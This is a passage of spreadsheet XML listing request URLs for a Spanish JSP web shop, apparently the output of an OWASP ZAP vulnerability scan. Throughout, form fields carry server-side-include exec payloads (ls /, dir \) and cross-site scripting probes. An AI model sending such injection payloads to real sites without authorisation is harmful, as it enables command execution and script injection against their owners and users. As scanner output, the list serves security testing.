    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;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&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;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&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;!--#exec+cmd="ls+/"--&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;!--#exec+cmd="ls+/"--&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;!--#exec+cmd="ls+/"--&gt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=&lt;!--#exec+cmd="ls+/"--&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;!--#exec+cmd="ls+/"--&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=&lt;!--#exec+cmd="dir+\\"--&gt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;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&lt;!--#exec+cmd="ls+/"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo="&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;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&lt;!--#exec+cmd="dir+\\"--&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login=&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=registro&amp;login="&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;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&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt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&lt;!--#exec+cmd="dir+\\"--&gt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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt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&lt;!--#exec+cmd="ls+/"--&gt;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"&gt;&lt;!--#exec+cmd="ls+/"--&gt;&lt;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&lt;!--#exec+cmd="dir+\\"--&gt;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"&gt;&lt;!--#exec+cmd="dir+\\"--&gt;&lt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=alert('owasp+zap');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alert('owasp+zap');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alert('owasp+zap');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pepe&amp;nombre=alert('owasp+zap');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pepe&amp;nombre=pepe&amp;apellidos=alert('owasp+zap');&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=alert('owaspzap');</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=alert('owasp+zap');&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=alert('owasp+zap');&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=alert('owasp+zap');&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=alert('owasp+zap');&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=alert('owaspzap');</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=alert('owasp+zap');&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=alert('owasp+zap');&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=alert('owasp+zap');&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=alert('owasp+zap');&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=alert('owasp+zap');&amp;nombre=vino+rioja&amp;precio=85&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=alert('owasp+zap');&amp;precio=85&amp;b1=añadir+al+carrito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alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=alert('owasp+zap');&amp;b1=añadir+al+carrito</t>
  </si>
  <si>
    <t>/antoanweb/publico/anadir.jsp?cantidad=1&amp;id=3&amp;nombre=vino+rioja&amp;precio=85&amp;b1=alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=alert('owasp+zap');&amp;login=1&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=alert('owasp+zap');&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=1&amp;b1=alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=alert('owasp+zap');&amp;login=pepe&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=alert('owasp+zap');&amp;pwd=pepe&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=alert('owasp+zap');&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=alert('owasp+zap');&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=alert('owasp+zap');&amp;pwd=pepe&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=alert('owasp+zap');&amp;remember=on&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=alert('owasp+zap');&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=alert('owasp+zap');&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=alert('owasp+zap');&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=alert('owasp+zap');&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=alert('owasp+zap');&amp;login=pepe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alert('owasp+zap');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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap')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alert('owasp+zap');</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=paros"+style="background:url(javascript:alert('owasp+zap'))&amp;b1=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;b1=paros"+style="background:url(javascript:alert('owasp+zap'))</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=paros"+style="background:url(javascript:alert('owasp+zap'))&amp;precio=85&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?modo=entrar&amp;login=pepe&amp;pwd=pepe&amp;remember=on&amp;b1=paros"+style="background:url(javascript:alert('owasp+zap'))</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=paros"+style="background:url(javascript:alert('owasp+zap'))&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?modo=insertar&amp;precio=85&amp;b1=paros"+style="background:url(javascript:alert('owasp+zap'))</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=paros"+style="background:url(javascript:alert('owasp+zap'))&amp;b1=pasar+por+caja</t>
  </si>
  <si>
    <t>/antoanweb/publico/pagar.jsp?precio=85&amp;b1=paros"+style="background:url(javascript:alert('owasp+zap'))</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?modo=paros"+style="background:url(javascript:alert('owasp+zap'))&amp;login=pepe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aros"+style="background:url(javascript:alert('owasp+zap'))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aros"+style="background:url(javascript:alert('owasp+zap'))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aros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))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paros"+style="background:url(javascript:alert('owasp+zap'))</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;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&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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"'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;login=pepe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&lt;script&gt;alert("owaspzap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;login=pepe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&lt;script&gt;alert('owaspzap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=&lt;script&gt;alert(owaspzap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;login=pepe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&lt;script&gt;alert("owasp+zap");&lt;/script&gt;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'"&lt;script&gt;alert('owaspzap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id="'&lt;script&gt;alert('owaspzap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;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bob@&lt;script&gt;alert('owaspzap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login='"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;password=pepe&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=bob@&lt;script&gt;alert(owaspzap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org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bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;password=pepe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&lt;script&gt;alert("owasp+zap");&lt;/script&gt;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&lt;script&gt;alert('owasp+zap');&lt;/script&gt;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&lt;script&gt;alert(owasp+zap);&lt;/script&gt;&amp;nombre=pepe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'"&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=&lt;script&gt;alert("owaspzap");&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=&lt;script&gt;alert('owaspzap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password="'&lt;script&gt;alert('owasp+zap');&lt;/script&gt;&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=&lt;script&gt;alert(owaspzap);&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=bob@&lt;script&gt;alert('owasp+zap')&lt;/script&gt;.example.org&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2='"&lt;script&gt;alert('owaspzap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2="'&lt;script&gt;alert('owaspzap');&lt;/script&gt;</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=bob@&lt;script&gt;alert(owasp+zap)&lt;/script&gt;.example.org&amp;nombre=pepe&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=bob@&lt;script&gt;alert('owaspzap')&lt;/script&gt;.example.org</t>
  </si>
  <si>
    <t>/antoanweb/miembros/editar.jsp?modo=insertar&amp;login=pepe&amp;password=pepe&amp;nombre=&lt;script&gt;alert("owasp+zap");&lt;/script&gt;&amp;apellidos=perez&amp;email=pepe@yahoo.es&amp;dni=76512347c&amp;direccion=pex,+2,+4�+a&amp;ciudad=valencia&amp;provincia=46&amp;cp=87623&amp;ntc=8734562384562786&amp;b1=confirmar</t>
  </si>
  <si>
    <t>/antoanweb/publico/vaciar.jsp?b2=bob@&lt;script&gt;alert(owaspzap)&lt;/script&gt;.example.org</t>
  </si>
  <si>
